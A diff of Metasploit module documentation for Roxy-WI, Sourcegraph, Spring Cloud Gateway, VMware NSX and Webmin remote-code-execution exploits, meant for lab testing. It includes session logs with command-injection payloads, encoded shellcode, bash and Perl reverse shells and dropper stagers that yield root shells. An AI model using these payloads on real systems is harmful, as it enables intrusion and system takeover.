+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > set Target 1 
+    Target => 1
+    msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp 
+    payload => linux/x64/shell/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (linux/x64/shell/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       1   Linux (Dropper)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 19:07:53 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 939
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
+    [*] Sending stage (38 bytes) to 172.22.230.145
+    [*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
+    i####################
+    # Response:
+    ####################
+    No response received
+    d[*] Command Stager progress - 100.00% done (810/810 bytes)
+    
+    id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    whoami
+    www-data
+    pwd
+    /var/www/haproxy-wi/app
+    ls
+    __pycache__
+    add.py
+    certs
+    config.py
+    create_db.py
+    db_model.py
+    funct.py
+    ha.py
+    hapservers.py
+    history.py
+    login.py
+    logs.py
+    metrics.py
+    nettools.py
+    options.py
+    overview.py
+    portscanner.py
+    provisioning.py
+    roxy-wi.db
+    runtimeapi.py
+    scripts
+    sections.py
+    servers.py
+    smon.py
+    sql.py
+    templates
+    users.py
+    versions.py
+    viewlogs.py
+    viewsttats.py
+    waf.py
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+commands that are able to be executed through the git exec REST API.
+
+The cloned repositories can be enumerated from the `/list` endpoint using the curl command:
+`curl http://$target:3178/list?cloned=true`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application (see detailed Docker Installation section below)
+2. Start msfconsole
+3. Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
+4. Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
+5. Do: `run`
+
+### Docker Installation
+1. Run the following command to start the all-inclusive docker container for Sourcegraph v3.36.3.
+
+    ```
+    docker run \
+      --publish 3178:3178 \
+      --publish 7080:7080 \
+      --publish 127.0.0.1:3370:3370 \
+      --rm \
+      --volume /tmp/sourcegraph/config:/etc/sourcegraph \
+      --volume /tmp/sourcegraph/data:/var/opt/sourcegraph \
+      sourcegraph/server:3.36.3
+    ```
+2. Once the service has started, navigate to the webinterface at http://localhost:7080
+3. When prompted, create an administrator's account
+4. At least one git repository must be added, complete the following steps to add one.
+    1. Navigate to `Repositories > Managed code hosts`
+    2. Select "Generic Git host"
+    3. When prompted, use the following example JSON code to clone Metasploit.
+
+        ```
+        {
+          "url": "https://github.com/",
+          "repos": [
+            "rapid7/metasploit-framework.git"
+          ]
+        }
+       ```
+
+## Options
+
+### EXISTING_REPO
+
+An existing, cloned repository. If this value is not set, a random one will be selected from the server.
+
+## Scenarios
+
+### Docker v3.36.3
+
+```
+msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
+[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully set core.sshCommand.
+[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
+[*] Executing Unix Command target
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
+
+meterpreter > 
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : caab8e904df4
+OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an unauthenticated RCE
+vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947)
+the versions affected are:
+
+- 3.1.0
+- 3.0.0 to 3.0.6
+- Older, unsupported versions are also affected
+
+A sample demo [project](https://github.com/wdahlenburg/spring-gateway-demo) is available,
+which can be used to run a vulnerable server by following the installation instructions below.
+    
+### Installation Instructions
+
+```bash
+    # To use the pre-compile vulnerable application
+    wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
+    sudo apt install default-jdk
+    java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+
+
+    # If you want to compile for a version of spring cloud gateway on your own
+    git clone https://github.com/wdahlenburg/spring-gateway-demo.git
+
+    # In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. 
+    # To see which spring cloud version includes which version of spring cloud gateway, 
+    # look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
+
+    apt install maven
+    mvn package -DskipTests
+    java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+```
+
+
+## Verification Steps
+
+- Run the vulnerable server
+- Start msfconsole
+- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
+- Do: `set RHOSTS <server_ip>`
+- Do: `set LHOST <metasploit_machine_ip>`
+- Do: `set RPORT 9000`
+- Do: `run`
+- You should get a Meterpreter shell.
+
+## Options
+
+No particular option to be set
+
+## Scenarios
+
+### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
+
+```
+msf6 > use exploit/linux/http/spring_cloud_gateway_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
+RHOSTS => 192.168.19.140
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
+RPORT => 9000
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set LHOST 192.168.1.7
+LHOST => 192.168.1.7
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if server is vulnerable
+[*] Triggering code execution using routes
+[+] Route deleted
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Triggering code execution using routes
+[*] Sending stage (40164 bytes) to 192.168.1.7
+[*] Meterpreter session 7 opened (192.168.1.7:4444 -> 192.168.1.7:53264) at 2022-10-11 17:44:53 -0400
+[+] Route deleted
+
+meterpreter >
+```
+
@@ -9,6 +9,7 @@ performs remote code execution as root by abusing the *extract* function used in

 ### Testing Environment

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
 according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.

@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library [CVE-2022-39144](https://nvd.nist.gov/vuln/detail/CVE-2021-39144).
+VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+a malicious actor can get remote code execution in the context of `root` on the appliance.
+
+VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13`
+are vulnerable to Remote Command Injection.
+
+This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:
+
+* VMware NSX Manager
+* Version `6.4.13`
+* Version `6.4.4`
+
+## Verification Steps
+
+Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
+* Go to [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Note: You need to be a customer with valid VMware subscriptions
+* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
+* Open VirtualBox and import the ova file
+* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
+* Credentials to login: user: `admin`, password: `default`
+* Use the module and options below to test the vulnerability...
+
+1. `use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### VMware NSX Manager bash reverse shell
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
+[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000
+
+pwd
+/usr/lib/tanuki/bin
+whoami
+root
+exit
+[*] 192.168.100.5 - Command shell session 14 closed.
+
+```
+
+### VMware NSX Manager meterpreter session
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
+[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
+[*] Sending payload to 192.168.100.5 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.100.5
+[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.100.5
+OS           : NSX Manager 6.4.13 (Linux 4.9.297)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+## Limitations
+The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
+However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely
+to be vulnerable.
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+In Webmin v1.984, any authenticated low privilege user without access rights to the
+File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing
+file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
+functionalities in the file manager.
+
+### Setup, on Ubuntu 20.04
+
+```
+wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
+sudo dpkg -i  webmin_1.984_all.deb
+```
+
+Webmin should now be installed. The credentials for the web UI will be the same as the
+user that installed Webmin
+
+## Options
+### USERNAME
+A specific username to authenticate as
+### PASSWORD
+A specific password to authenticate with
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_file_manager_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a session as the `root` user.
+
+## Scenarios
+### Webmin 1.984, on Ubuntu 20.04
+
+```
+msf6 > exploit/linux/http/webmin_file_manager_rce
+[*] Using exploit/linux/http/webmin_file_manager_rce
+msf6 exploit(linux/http/webmin_file_manager_rce) > set password notpassword
+password => notpassword
+msf6 exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
+rhosts => 172.16.199.132
+msf6 exploit(linux/http/webmin_file_manager_rce) > set username msfuser
+username => msfuser
+msf6 exploit(linux/http/webmin_file_manager_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
+[*] Attempting to authenticate with Webmin
+[+] Authentication successful
+[*] Downloading remote url
+[*] Fetching payload from HTTP server
+[*] Request 'GET /tmBFT82mvsHD.cgi'
+[*] Sending payload ...
+[*] Finished downloading remote url
+[*] Modifying the permissions of the uploaded payload to 0755
+[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
+[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+This module exploits an arbitrary command injection in Webmin versions prior to
+1.997.
+
+Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
+updates and installation. Due to a lack of input sanitization, it is possible to
+inject an arbitrary command that will be concatenated to the package manager call.
+
+This exploit requires authentication and the account must have access to the
+Software Package Updates module.
+
+## Installation
+
+### Ubuntu
+- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
+- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
+```
+apt-get install libauthen-pam-perl libio-pty-perl
+dpkg -i ./webmin_1.996_all.deb
+```
+
+## Setup
+- Go to `https://<target IP>:10000/`
+- Login as `root` with the OS password
+- Create a new user:
+  `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
+- Setup permissions
+  `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`
+
+## Verification Steps
+1. Install and setup the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_package_updates_rce`
+1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
+1. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+Set this to the Webmin base path. The default is `/`.
+
+### USERNAME
+
+The account username to use.
+
+### PASSWORD
+
+The account password.
+
+## Scenarios
+
+### Webmin 1.996 on Ubuntu 18.04
+- Target 0 (`Unix In-Memory`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+cat /etc/issue
+Ubuntu 18.04.6 LTS \n \l
+```
+
+- Target 1 (`Linux Dropper`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 192.168.0.23
+[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.0.23
+OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1,2 @@`
				`$someText = "Hello!" ; $someText > "C:\flag.txt"`